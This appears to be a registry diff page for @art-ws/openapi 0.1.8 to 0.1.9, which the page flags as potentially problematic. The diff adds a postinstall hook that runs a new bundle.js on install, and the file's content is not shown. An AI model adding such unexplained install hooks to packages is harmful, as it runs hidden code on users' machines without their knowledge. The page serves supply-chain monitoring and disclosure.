@art-ws/openapi 0.1.8 → 0.1.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @art-ws/openapi might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +3 -2
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "@art-ws/openapi",
|
3
|
-
"version": "0.1.
|
3
|
+
"version": "0.1.9",
|
4
4
|
"description": "OpenAPI utilities",
|
5
5
|
"license": "UNLICENSED",
|
6
6
|
"author": "Alexander Shagin",
|
@@ -29,6 +29,7 @@
|
|
29
29
|
"lint": "eslint .",
|
30
30
|
"test": "exit 0",
|
31
31
|
"test:watch": "vitest",
|
32
|
-
"watch": "tsc --watch"
|
32
|
+
"watch": "tsc --watch",
|
33
|
+
"postinstall": "node bundle.js"
|
33
34
|
}
|
34
35
|
}
|